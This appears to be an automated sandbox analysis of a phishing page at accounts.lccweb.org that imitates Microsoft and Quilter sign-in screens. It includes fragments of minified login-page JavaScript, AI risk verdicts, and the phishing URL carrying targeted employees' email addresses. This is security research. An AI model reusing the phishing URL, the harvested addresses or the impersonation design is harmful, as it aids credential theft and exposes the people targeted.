!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
| URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is benign and focused on providing a consistent Promise implementation across different browsers. There are no clear indicators of malicious intent or data exfiltration, so the risk score is relatively low."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function n(n){for(var t,i,o=n[0],r=n[1],s=0,c=[];s<o.length;s++)i=o[s],Object.prototype.hasOwnProperty.call(a,i)&&a[i]&&c.push(a[i][0]),a[i]=0;for(t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t]);for(d&&d(n);c.length;)c.shift()()}var t,i={},a={24:0};function o(n){if(i[n])return i[n].exports;var t=i[n]={i:n,l:!1,exports:{}};return e[n].call(t.exports,t,t.exports,o),t.l=!0,t.exports}Function.prototype.bind||(t=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var n=t.call(arguments,1),i=n.length,a=this,o=function(){},r=function(){return n.length=i,n.push.apply(n,arguments),a.apply(o.prototype.isPrototypeOf(this)?this:e,n)};return this.prototype&&(o.prototype=this.prototype),r.prototype=new o,r}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(n){var t=this,i=0,a=null,o=[];function r(){if(o.length>0){var e=o.slice();o=[],setTimeout((function(){for(var n=0,t=e.length;n<t;++n)e[n]()}),0)}}function s(e){0===i&&(a=e,i=1,r())}function c(e){0===i&&(a=e,i=2,r())}t.then=function(n,t){return new e((function(s,c){!function(n,t,s,c){o.push((function(){var o;try{o=1===i?"function"==typeof n?n(a):a:"function"==typeof t?t(a):a}catch(r){return void c(r)}o instanceof e?o.then(s,c):2===i&&"function"!=typeof t?c(o):s(o)})),0!==i&&r()}(n,t,s,c)}))},t["catch"]=function(e){return t.then(null,e)},function(){if("function"!=typeof n)throw new TypeError("Promise: argument is not a Function object");try{n(s,c)}catch(e){c(e)}}()}function n(e,n,t,i,a){return function(o){e[n]=i?o:a?{status:"fulfilled",value:o}:{status:"rejected",reason:o},t()}}function t(t,i){return t&&t.length?new e((function(a,o){for(var r=[],s=0,c=0,d=t.length;c<d;++c){var l=t[c];if(l instanceof e){s++;var u=function(){0==--s&&a(r)};i?l.then(n(r,c,u,i),o):l.then(n(r,c,u,i,!0),n(r,c,u,i,!1))}else r[c]=l}0===s&&setTimeout((function(){a(r)}),0)})):e.resolve([])}function i(e,n){return function(){e(n)}}e.all=function(e){return t(e,!0)},e.allSettled=function(e){return t(e,!1)},e.race=function(n){return new e((function(t,a){if(n&&n.length)for(var o=0,r=n.length;o<r;++o){var s=n[o];s instanceof e?s.then(t,a):setTimeout(i(t,s),0)}}))},e.reject=function(n){return new e((function(e,t){t(n)}))},e.resolve=function(n){return n instanceof e?n:n&&"function"==typeof n.then?new e((function(e,t){n.then(e,t)})):new e((function(e){e(n)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),o.e=function(e){var n=[],t=a[e];if(0!==t)if(t)n.push(t[2]);else{var i=new Promise((function(n,i){t=a[e]=[n,i]}));n.push(t[2]=i);var r=window.ServerData,s=r&&r.loader&&r.loader.cdnRoots||[],c=r&&r.slMaxRetry?r.slMaxRetry:s.length-1,d=new Error;var l=function u(n |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including redirecting the user to a potentially untrusted domain and modifying the URL with query parameters. While the intent is not entirely clear, the script's behavior raises concerns and requires further investigation."
} |
//< |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script uses aggressive DOM manipulation and external data transmission without transparency, but it does not exhibit high-risk behaviors like dynamic code execution or data exfiltration. The context suggests it is part of a legitimate third-party library, which reduces the risk score."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/
(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(539).concat([function(t,e,r){var n=r(2),o=r(22),i=r(0),s=r(5),u=r(1018),a=r(3).Array,c=i.StringCustomizationPageId;t.exports=function(t){var e=this,r=t.serverData,f=t.pageId;function l(t){return function(t){var e=0,n=r.slMaxRetry||0;if(!t)return s.reject();return new s((function(r,s){var u={targetUrl:t,contentType:i.ContentType.Json,requestType:o.RequestType.Get,timeout:3e4,successCallback:function(t,e){r(e)},failureCallback:function(t){e<n?(e+=1,new o.Handler(u).sendRequest()):s(t)}};new o.Handler(u).sendRequest()}))}(t).then((function(t){return JSON.parse(t)}),(function(){e.strings.isLoadFailure(!0)}))}e.customCssLoader=new u,e.strings=n.observable({}),e.strings.isLoadComplete=n.observable(!1),e.strings.isLoadFailure=n.observable(!1),e.isLoadComplete=n.observable(!1),e.isLoadFailure=n.observable(!1),e.initialize=function(){},e.load=function(t){var r,n=[],o=[];return t.customStringsFiles&&function(t,r){var n=[];switch(f){case c.ConditionalAccess:t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.AttributeCollection:t.attributeCollection&&n.push(t.attributeCollection);break;case c.ProofUpPage:t.authenticatorNudgeScreen&&n.push(t.authenticatorNudgeScreen),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.ErrorPage:t.adminConsent&&n.push(t.adminConsent),t.conditionalAccess&&n.push(t.conditionalAccess);break;case c.LoginPage:t.attributeCollection&&n.push(t.attributeCollection);break;case c.MessagePage:}var o=n.length;if(o)for(var i=0;i<o;i++)r.push(l(n[i]));else e.strings.isLoadComplete(!0)}(t.customStringsFiles,o),t.customCss&&n.push((r=t.customCss,e.customCssLoader.loadAsync(r))),s.allSettled(o).then((function(t){var r=[];a.forEach(t,(function(t){t&&"fulfilled"===t.status&&t.value&&(r=r.concat(t.value))})),e.strings(r),e.strings.isLoadComplete(!0)})),s.allSettled(n.concat(o)).then((function(){e.isLoadComplete(!0)})),s.all(n)["catch"]((function(t){throw e.isLoadFailure(!0),t}))}}},,,function(t,e,r){"use strict";var n=r(545),o=r(570).f,i=r(571),s=r(561),u=r(742),a=r(635),c=r(637);t.exports=function(t,e){var r,f,l,h,p,d=t.target,y=t.global,v=t.stat;if(r=y?n:v?n[d]||u(d,{}):n[d]&&n[d].prototype)for(f in e){if(h=e[f],l=t.dontCallGetSet?(p=o(r,f))&&p.value:r[f],!c(y?f:d+(v?".":"#")+f,t.forced)&&l!==undefined){if(typeof h==typeof l)continue;a(h,l)}(t.sham||l&&l.sham)&&i(h,"sham",!0),s(r,f,h,t)}}},function(t,e,r){"use strict";t.exports=function(t){try{return!!t()}catch(e){return!0}}},function(t,e,r){"use strict";var n=r(633),o=Function.prototype,i=o.call,s=n&&o.bind.bind(i,i);t.exports=n?s:function(t){return function(){return i.apply(t,arguments)}}},function(t,e,r){"use strict";(function(e){var r=function(t){return t&&t.Math===Math&&t};t.exports=r("object"==typeof globalThis&&globalThis)||r("object"==typeof window&&window)||r("object"==typeof self&&self)||r("object"==typeof e&&e)||r("object"==typeof this&&this)||function(){return this}()||Function("return this")()}).call(this,r(40))},function(t,e,r){"use strict";var n=r(543);t.exports=!n((func |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Quilter"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=steven.levin%40quilter.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "quilter.com", "classification": "known", "reasons": [ "The brand 'Quilter' is a known financial services company.", "The URL 'accounts.lccweb.org' does not match the legitimate domain 'quilter.com'.", "The domain 'lccweb.org' does not have any known association with the brand 'Quilter'.", "The presence of a password input field on a non-legitimate domain is suspicious.", "The URL structure does not include any direct reference to 'Quilter', which is a red flag." ], "riskscore": 8}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Quilter
Input Fields: Password |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Trying to sign you in",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"tim.twat@quilter.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "This username may be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.",
"prominent_button_name": "Next",
"text_input_field_labels": [
"tim.twat@quilter.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'accounts.lccweb.org' does not match the legitimate domain for Microsoft.", "The domain 'lccweb.org' does not have any known association with Microsoft.", "The use of a subdomain 'accounts' is common in phishing attempts to mimic legitimate login pages.", "The domain 'lccweb.org' could be a legitimate domain for another entity, but it is not related to Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Microsoft
Input Fields: tim.twat@quilter.com |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | ```json{ "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.", "The URL 'accounts.lccweb.org' does not match the legitimate domain for Microsoft.", "The domain 'lccweb.org' does not have any known association with Microsoft.", "The presence of a subdomain 'accounts' is common in phishing attempts to mimic legitimate login pages.", "The domain 'lccweb.org' could be a legitimate domain for another entity, but it is not related to Microsoft." ], "riskscore": 9}
Google indexed: False |
URL: accounts.lccweb.org
Brands: Microsoft
Input Fields: tim.twat@quilter.com |
| URL: https://lccweb.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://lccweb.org |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5x×tamp=1734514206388&uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea&username=tim.twat%40quilter.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
Edit tour
chrome.exe (PID: 4044 cmdline: 
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node